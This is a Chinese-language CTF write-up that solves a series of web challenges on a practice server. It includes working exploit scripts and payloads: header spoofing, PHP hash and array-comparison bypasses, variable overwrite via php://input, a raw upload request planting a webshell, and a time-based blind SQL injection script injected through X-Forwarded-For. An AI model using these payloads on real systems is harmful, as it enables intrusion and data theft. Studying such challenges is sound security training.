你从哪里来
http://123.206.87.240:9009/from.php
加上Referer:https://www.google.com 必须要https,我之前尝试http怎么也出不来flag
flag{bug-ku_ai_admin}
md5 collision(NUPT_CTF)
http://123.206.87.240:9009/md5.php
莫名其妙的题,输一个md5值为0e的字符串,就得到flag了,http://123.206.87.240:9009/md5.php?a=s878926199a
flag{md5_collision_is_easy}
程序员本地网站
http://123.206.87.240:8002/localhost/
请从本地访问
设置headers X-Forwarded-For:127.0.0.1 就得到flag了
flag{loc-al-h-o-st1}
各种绕过
各种绕过哟
http://123.206.87.240:8002/web7/
代码审计题,代码如下:
<?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['uname'] == $_POST['passwd']) print 'passwd can not be uname.'; else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) die('Flag: '.$flag); else print 'sorry!'; } ?>
考点在sha1($_GET['uname']) === sha1($_POST['passwd']) 传入的两个参数不能相等,但是sha1()后的值需要全等,利用sha1()处理数组返回flase的漏洞,进行绕过,解题脚本如下:
# -*- coding:utf-8 -*- import requests if __name__ == '__main__': url = 'http://123.206.87.240:8002/web7/?uname[]=&id=margin' response = requests.post(url, data={"passwd[]": "1"}) print(response.text)
flag{HACK_45hhs_213sDD}
web8
txt????
http://123.206.87.240:8002/web8/
<?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?>
变量覆盖漏洞,解题脚本如下:
# -*- coding:utf-8 -*- import requests if __name__ == '__main__': url = 'http://123.206.87.240:8002/web8/?ac=1&fn=php://input' response = requests.post(url, data='1') print(response.text)
flag{3cfb7a90fc0de31}
细心
地址:http://123.206.87.240:8002/web13/
想办法变成admin
首页显示404,扫描一下目录,有robots.txt文件,访问resusl.php,提示要输入密码,随便输入测试一下,最后输入admin得到flag
flag(ctf_0098_lkji-s)
求getshell
求getshell
http://123.206.87.240:8002/web9/
文件上传绕过,使用burpsuite拦截请求,并修改header中的Content-Type,改一下大小写,然后修改文件后缀名为php2, php3, php4, php5, phps, pht, phtm, phtml,一个一个测试,最终php5成功。
POST /web9/index.php HTTP/1.1 Host: 123.206.87.240:8002 Content-Length: 426 Cache-Control: max-age=0 Origin: http://123.206.87.240:8002 Upgrade-Insecure-Requests: 1 Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryFIpHkQ8rB2zpCR8U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://123.206.87.240:8002/web9/ Accept-Language: zh-CN,zh;q=0.9,und;q=0.8 Connection: close ------WebKitFormBoundaryFIpHkQ8rB2zpCR8U Content-Disposition: form-data; name="file"; filename="QQ截图20190817094816.php5" Content-Type: image/png PNG webshell ------WebKitFormBoundaryFIpHkQ8rB2zpCR8U Content-Disposition: form-data; name="submit" Submit ------WebKitFormBoundaryFIpHkQ8rB2zpCR8U--
KEY{bb35dc123820e}
INSERT INTO注入
题目:
地址:http://123.206.87.240:8002/web15/
flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧
error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } $ip_arr = explode(',', $ip); return $ip_arr[0]; } $host="localhost"; $user=""; $pass=""; $db=""; $connect = mysql_connect($host, $user, $pass) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); $ip = getIp(); echo 'your ip is :'.$ip; $sql="insert into client_ip (ip) values ('$ip')"; mysql_query($sql);
解答:
题目提供了源码,看源码应该是通过sleep进行盲注,但是过滤了逗号(,),需要绕过逗号进行盲注,解题脚本如下:
# -*- coding:utf-8 -*- import requests if __name__ == '__main__': # url = 'http://123.206.87.240:8002/web15/' # allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM''' # database = '' # flag = 1 # for i in range(1, 10): # for j in allString: # header = { # "X-Forwarded-For": "1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#" % ( # i, ord(j)) # } # r = requests.get(url, headers=header) # t = r.elapsed.total_seconds() # # print('the time of ' + j + ' is ' + str(t)) # if t >= 3: # database = database + j # print('the ' + str(i) + ' place of database is ' + j) # break # elif t < 3 and j == 'M': # flag = 0 # break # if flag == 0: # break # print('database:', database) #web15 # url = 'http://123.206.87.240:8002/web15/' # allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM''' # table_name = '' # flag = 1 # for i in range(1, 20): # for j in allString: # header = { # "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))=%d) then sleep(3) else 0 end))#" % ( # i, ord(j)) # } # r = requests.get(url, headers=header) # t = r.elapsed.total_seconds() # #print('the time of ' + j + ' is ' + str(t)) # if t >= 3 and t < 4: # table_name = table_name + j # print('the ' + str(i) + ' place of table_name is ' + j) # break # elif t < 3 and j == 'M': # flag = 0 # break # if flag == 0: # break # print('table_name:', table_name)#flag # url = 'http://123.206.87.240:8002/web15/' # allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM''' # column_name = '' # flag = 1 # for i in range(1, 20): # for j in allString: # header = { # "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#" % ( # i, ord(j)) # } # r = requests.get(url, headers=header) # t = r.elapsed.total_seconds() # #print('the time of ' + j + ' is ' + str(t)) # if t >= 3 and t < 4: # column_name = column_name + j # print('the ' + str(i) + ' place of table_name is ' + j) # break # elif t < 3 and j == 'M': # flag = 0 # break # if flag == 0: # break # print('column_name:', column_name) url = 'http://123.206.87.240:8002/web15/' allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM''' flag = '' f = 1 for i in range(1,30): for j in allString: header = { "X-Forwarded-For":"1'+(select case when (ascii(substr((select flag from flag) from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j)) } r = requests.get(url,headers=header) t = r.elapsed.total_seconds() #print('the time of '+j+' is '+str(t)) if t >= 3 and t < 4: flag = flag + j print('the '+str(i)+' place of table_name is '+j) break elif t < 3 and j == 'M': f = 0 break if f == 0 : break print('flag:',flag)
flag{cdbf14c9551d5be5612f7bb5d2867853}
这是一个神奇的登陆框
题目:
http://123.206.87.240:9001/sql/
flag格式flag{}
解题:
打开就是一个登录页面,用bp抓包,放到sqlmap中跑,直接能跑出注入点
POST /sql/ HTTP/1.1 Host: 123.206.87.240:9001 Content-Length: 52 Cache-Control: max-age=0 Origin: http://123.206.87.240:9001 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://123.206.87.240:9001/sql/ Accept-Language: zh-CN,zh;q=0.9,und;q=0.8 Cookie: isadmin=false Connection: close admin_name=admin&admin_passwd=123456&submit=GO+GO+GO
flag{ed6b28e684817d9efcaf802979e57aea}